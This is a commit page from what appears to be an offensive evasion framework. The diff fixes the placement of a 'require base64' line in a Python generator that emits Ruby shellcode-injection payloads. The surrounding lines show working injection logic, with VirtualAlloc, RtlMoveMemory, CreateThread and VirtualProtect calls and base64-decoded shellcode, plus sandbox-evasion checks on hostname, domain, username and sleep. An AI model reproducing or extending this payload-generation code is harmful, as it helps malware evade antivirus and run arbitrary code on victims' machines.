Finally figured out this issue

sabriallani · Nov 21, 2017 · d953c71 · d953c71
1 parent 6494a8c
commit d953c71
Showing 1 changed file with 1 addition and 2 deletions.
diff --git a/Tools/Evasion/payloads/ruby/shellcode_inject/base64.py b/Tools/Evasion/payloads/ruby/shellcode_inject/base64.py
@@ -62,6 +62,7 @@ def generate(self):
         payload_code = "require 'rubygems'\n"
         payload_code += "require 'win32/api'\n"
         payload_code += "include Win32\n"
+        payload_code += "require 'base64'\n"
         # Add logic for adding this line, stupid bug and I have no idea
         # why this is even a problem, but ruby is dumb
         if self.required_options["HOSTNAME"][0] != "X" or self.required_options["DOMAIN"][0] != "X" or self.required_options["USERNAME"][0] != "X" or self.required_options["SLEEP"][0] != "X":
@@ -101,8 +102,6 @@ def generate(self):
         protect_out = evasion_helpers.randomString()
         rand_protect = evasion_helpers.randomString()
 
-        payload_code += "require 'base64'\n"
-
         if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
             payload_code += valloc_random + " = API.new('VirtualAlloc', 'IIII', 'I');" + rtlmove_random + " = API.new('RtlMoveMemory', 'IPI', 'V');" + createthread_random + " = API.new('CreateThread', 'IIIIIP', 'I');" + waitfor_random + " = API.new('WaitForSingleObject', 'II', 'I');" + rand_protect + " = API.new('VirtualProtect', 'PIIP', 'I')\n"
             payload_code += payloadName + " = [\"" + Shellcode + "\".unpack(\"m\")[0].delete(\"\\\\\\\\x\")].pack(\"H*\")\n"